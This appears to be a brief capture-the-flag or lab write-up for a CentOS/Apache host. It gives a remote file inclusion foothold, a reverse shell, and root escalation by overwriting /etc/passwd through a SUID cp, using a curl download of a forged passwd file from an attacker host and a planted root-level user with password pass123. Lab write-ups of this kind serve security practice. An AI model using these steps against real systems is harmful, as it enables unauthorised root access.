1011.1.35
RFI Page Parameter found by manual probing. OS Reverse shell and cp SUID privilege escalation.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
PHP Really nice shell which could be used to spawn PHP based shell & os level shell
```linpeas.sh shadow shell.elf rm shadow rm: cannot remove 'shadow': Operation not permitted
ls linpeas.sh shadow shell.elf
curl "http://192.168.119.129:80/passwd" -o passwd
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 979 100 979 0 0 8770 0 --:--:-- --:--:-- --:--:-- 8819l s linpeas.sh passwd shadow shell.elf cp passwd /etc/passwd
tail /etc/passwd ftp❌14:50:FTP User:/var/ftp:/sbin/nologin nobody❌99:99:Nobody:/:/sbin/nologin systemd-network❌192:192:systemd Network Management:/:/sbin/nologin dbus❌81:81:System message bus:/:/sbin/nologin polkitd❌999:998:User for polkitd:/:/sbin/nologin sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix❌89:89::/var/spool/postfix:/sbin/nologin chrony❌998:996::/var/lib/chrony:/sbin/nologin apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
su chiya Password: pass123 ls linpeas.sh passwd shadow shell.elf whoami root
cd /root ls anaconda-ks.cfg proof.txt cat proof.txt 99d8f4f10cf80eed5cb67e73e8b60a3d```
Helpful links
Last updated